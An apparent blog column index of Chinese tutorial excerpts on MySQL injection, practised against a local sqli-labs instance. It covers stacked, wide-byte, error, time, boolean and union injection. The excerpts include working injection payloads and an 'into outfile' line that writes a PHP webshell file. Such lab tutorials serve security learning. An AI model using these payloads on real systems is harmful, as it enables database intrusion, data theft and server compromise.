MySQL注入
关注
分享
扫一扫
web安全工具库
这个作者很懒,什么都没留下…
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
Mysql注入 -- 堆叠注入
你上学时没读过的书、没上过的课、没跑过的步,总有一天会让你全部还回来。。。---- 网易云热评一、堆叠注入介绍1、多条sql语句同时执行2、union只能执行查询语句,堆叠可以执行增删改查3、同时执行三条语句select 1;select 2;select 3;二、插入注入1、找到注入点,添加一条数据http://192.168.139.129/sqli/Less-38/?id=1';insert into users(id,username,passwor..原创 2021-05-25 08:44:06 · 1347 阅读 · 5 评论 -
MySQL注入 -- 宽字节注入
很多事情,原来努力了,也得不到满意的结果。。。---- 网易云热评一、宽字节注入介绍1、在注入点输入(')会被转义为(\')编码后为(%5c%27),只有把斜杆去掉才能注入2、GBK编码表,%DF%5C正好组成(運),所以会把\"吃掉",0X81-0XFE都可以二、实例演示1、获取数据库名称http://192.168.139.129/sqli/Less-32/?id=1%81' and 1=2 union select 1,2,database() --+...原创 2021-05-21 16:24:42 · 1919 阅读 · 10 评论 -
Mysql注入 -- 报错注入
时刻清零,不要老把自己的一套拿出来。。。---- 网易云热评一、常用函数1、count();统计该列有几条数据2、rand():产生0-1随机数3、group by:根据某一列排序,改列必须出现在前面查询的内容4、floor(1.23):获取小于等于该值的最大整数5、as:给查询的列名内容重命名6、concat(1,2,3):将里面的内容连接在一起二、实例演示1、获取当前数据库名称http://192.168.139.129/sqli/Less-.原创 2021-05-20 09:12:03 · 845 阅读 · 1 评论 -
Mysql注入 -- 延时注入
生活不止眼前的苟且,还有房费、饭费、水电费。。。----网易云热评一、常用函数1、sleep(5):延时5秒2、if(a,b,c):a为条件,正确返回b,否则返回c二、实例测试1、找到可以注入的payload,服务器反映5秒才有相应http://192.168.139.129/sqli/Less-9/?id=1' and sleep(5) --+2、获取数据库长度,如果数据库名的长度等于8停留5秒http://192.168.139.129/sqli/..原创 2021-05-16 21:10:04 · 2998 阅读 · 15 评论 -
Mysql注入 -- 布尔注入
千万不要在你还没辞职的时候,告诉你同事说要辞职了。。。---- 网易云热评 一、常用函数1、mid(str,1,5):取字符串str的前5个字节2、ord():转换成ASCII码3、length():统计长度4、 ascii():将字符转换ASCII二、实例演示1、and 1=1访问http://192.168.139.129/sqli/Less-8/?id=1'and1=1--+返回正确2、and 1=2访问http://192.168...原创 2021-05-14 20:40:54 · 1553 阅读 · 8 评论 -
Mysql注入 -- 联合注入
得到一个像原来老师一样督促你、关心你的人很难。。。---- 网易云热评一、常用命令及函数1、orderby排序,获取数据有几个字段,后面小于等于字段数,都会返回结果,大于字段数返回错误select * from users order by 3;2、unionselect联合查询,后边必须跟一样的字段数select * from users union select 1,2,5;3、user()查看当前mysql用户4、version()查看mysql版...原创 2021-05-12 11:08:46 · 598 阅读 · 1 评论 -
Mysql注入 -- 数据库导出及读文件
社会运行的规则和自己的不一样,不能我行我素,甚至有时还得违心讨好。。。---- 网易云热评 一、数据库导出文件1、连接数据库2、通过intooutfile导出数据库内容select * from users into outfile "c:/1.sql";3、通过intooutfile语句,在C盘目录写入一句话木马select '<?php phpinfo();?>' into outfile "c:/aiyou.php";4、通过实例导出一...原创 2021-05-11 17:15:15 · 990 阅读 · 6 评论 -
Mysql注入 -- 注入类型
钱真的很重要,以前总觉得太看重钱的人现实,但没钱,真的寸步难行。。。---- 网易云热评一、整数注入1、访问http://192.168.139.129/sqli/Less-2/?id=1and 1=1,返回正常2、访问http://192.168.139.129/sqli/Less-2/?id=2-1,返回正常3、访问http://192.168.139.129/sqli/Less-2/?id=1and 1=2,返回不正常说明该注入点是整数注入二、字符串注...原创 2021-05-10 15:18:30 · 1309 阅读 · 9 评论